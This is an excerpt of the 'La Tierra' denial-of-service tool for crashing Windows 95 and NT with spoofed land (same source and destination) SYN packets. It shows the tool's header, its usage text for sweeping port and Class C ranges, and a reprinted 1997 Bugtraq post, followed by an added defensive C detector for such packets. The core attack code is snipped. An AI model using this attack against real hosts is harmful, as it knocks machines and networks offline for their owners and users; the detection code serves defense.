/* [ http://www.rootshell.com/ ] */
/**************************************************************/
/* La Tierra v1.0 - by MondoMan (KeG), elmondo@usa.net */
/* Developed for stress testing Windows NT 4.0 Sp3 */
/* Modified version of land.c by m3lt, FLC */
/* */
/* This program crashes Windows 95, and will cause Windows NT */
/* 4.0, SP3 to utilize a high percentage of CPU. In some */
/* cases, CPU utilization peaks at 100%. */
/* */
/* land.c description: */
/* land.c sends a spoofed packet with the SYN flag from the */
/* same IP and port number as the destination. For */
/* example, if you want to crash 1.1.1.1, port 80, it would */
/* spoof 1.1.1.1 port 80 as the source. The problem with */
/* NT Sp3, however, is that once you do issue this packet to a */
/* port, NT Sp3 will ignore all other attempts - UNTIL .... */
/* */
/* La Tierra! */
/* */
/* La Tierra description: */
/* */
/* La Tierra basically works by sending NT Sp3 the same packet*/
/* used in land.c but to any port. Sounds simple? There's */
/* more to it. Cycle through a range of ports - and see what */
/* happens. It doesn't appear to matter if the port is */
/* opened or closed :-) Since NT won't let this happen again */
/* on the same port, you simply change ports, and you can */
/* easily go back to the original port and it'll work again. */
/* */
/* As a test, I set up 2 NT Sp3 machines, ran latierra from my */
/* linux computer and watched as NT Sp3 tried to deal with it.*/
/* Just out of curiosity, I did a zone-transfer from my */
/* intranet's DNS server, wrote a perl script to walk the DNS */
/* table and blow-up every Windows 95 station it possibly could. */
/* Needless to say, my darn beeper started going off! */
/* If using VI, tab=3 (press ':', then set ts=3) */
/* If you want to send to an entire Class C range then */
/* simply specify the last octet with a '-', and the IP range */
/* will start at 1 and end with 254, incrementing with each */
/* loop. If Loop equals FOR_EVER, the loop cycles forever */
/* until the process is stopped. */
/* use the -h option for more help */
/* */
/* Good luck. */
/* */
/* Additional Parameters: */
/* */
/* -b beginning_port_number -e port_number */
/* -s seconds -l loop # of cycles */
/* default is every 7 seconds */
/* -o 1 suppress additional output */
/* */
/* Compiled on Intel Pentium, 200mhz, RedHat Linux 2.0.27 */
/* */
/* gcc latierra.c -o latierra */
/* */
/**************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <string.h>
#include <getopt.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
[snip...]
printf("Arguments: -i dest_ip -b port# [-e port#] [-s seconds_delay] [-l loop]\n\n");
printf(" -i dest_ip = destination ip address such as 1.1.1.1\n");
printf(" If the last octet is '-', then the address will increment\n");
printf(" starting at 1, ending at 254 (Class C) on the next loop\n");
printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
printf(" -b port# = beginning port number (required).\n");
printf(" -e port# = ending port number (optional)\n");
printf(" -s seconds = seconds before incrementing port count.\n");
printf(" -o 1 = suppress additional output to screen.\n");
printf(" -l loop = number of times to loop through ports or scan. %d=forever.\n\n", FOR_EVER);
printf(" Sample command lines:\n\n");
printf(" latierra -i 1.1.1.1 -b 80\n");
printf(" latierra -i 1.1.1.1 -b 23 -e 80 -s 2 -l 2 -o 1\n");
printf(" latierra -i 1.1.1.- -b 23 -e 80 -s 2 -l -5\n");
printf("\n -La Tierra\n");
return(-1);
}
[snip...]
=-=
From meltman@LAGGED.NET Wed Dec 10 13:28:49 1997
From: m3lt
To: BUGTRAQ@NETSPACE.ORG
Date: Thu, 20 Nov 1997 19:40:19 -0500
Subject: new TCP/IP bug in win95
hi,
i recently discovered a bug which freezes win95 boxes. here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.
the piece of code included in this message does that, so... have fun!
i haven't tested this bug on other platforms, i don't have the
resources. please feel free to do so.
m3lt
meltman@lagged.net
--- snip snip -----------------------------------------------------------
=-=
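Added example, not part of latierra.c or of m3lt's posting: a receive-side check for the packet both texts describe (a TCP SYN whose source address and port equal the destination address and port), usable as the core of a packet filter or IDS rule. The two sample packets are constructed for illustration with checksums zeroed and not validated, and the name is_land_packet is an assumption of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: IPv4+TCP SYN, 10.0.0.1:139 -> 10.0.0.1:139 (checksums zeroed). */
static const uint8_t SAMPLE_LAND[40] = {
    0x45,0x00,0x00,0x28, 0x00,0x00,0x00,0x00, 0x40,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x01, 0x0a,0x00,0x00,0x01,
    0x00,0x8b,0x00,0x8b, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
    0x50,0x02,0x08,0x00, 0x00,0x00,0x00,0x00 };

/* Constructed sample: ordinary SYN, 10.0.0.2:1025 -> 10.0.0.1:139. */
static const uint8_t SAMPLE_NORMAL[40] = {
    0x45,0x00,0x00,0x28, 0x00,0x00,0x00,0x00, 0x40,0x06,0x00,0x00,
    0x0a,0x00,0x00,0x02, 0x0a,0x00,0x00,0x01,
    0x04,0x01,0x00,0x8b, 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
    0x50,0x02,0x08,0x00, 0x00,0x00,0x00,0x00 };

/* Returns 1 when pkt (starting at the IPv4 header) is TCP with SYN set and
 * source address/port equal to destination address/port; 0 otherwise,
 * including truncated, non-IPv4 and non-first-fragment input. */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    if (pkt == NULL || len < 20 || (pkt[0] >> 4) != 4)
        return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;      /* IP header length in bytes */
    if (ihl < 20 || len < ihl + 14)                /* need TCP bytes 0..13 */
        return 0;
    if (pkt[9] != 6)                               /* protocol 6 = TCP */
        return 0;
    if ((((pkt[6] & 0x1f) << 8) | pkt[7]) != 0)    /* later fragment: no TCP header */
        return 0;
    const uint8_t *tcp = pkt + ihl;
    if ((tcp[13] & 0x02) == 0)                     /* SYN flag not set */
        return 0;
    /* No port list is consulted: the La Tierra header reports the packet
     * has an effect on any port, open or closed, so every port is checked. */
    return memcmp(pkt + 12, pkt + 16, 4) == 0 &&   /* src addr == dst addr */
           memcmp(tcp, tcp + 2, 2) == 0;           /* src port == dst port */
}

int main(void)
{
    printf("land sample:   %d\n", is_land_packet(SAMPLE_LAND, sizeof SAMPLE_LAND));
    printf("normal sample: %d\n", is_land_packet(SAMPLE_NORMAL, sizeof SAMPLE_NORMAL));
    return 0;
}
```

Because the check is per packet and independent of the port number, it matches every packet of a port sweep or Class C sweep as described in the header, not only the first one.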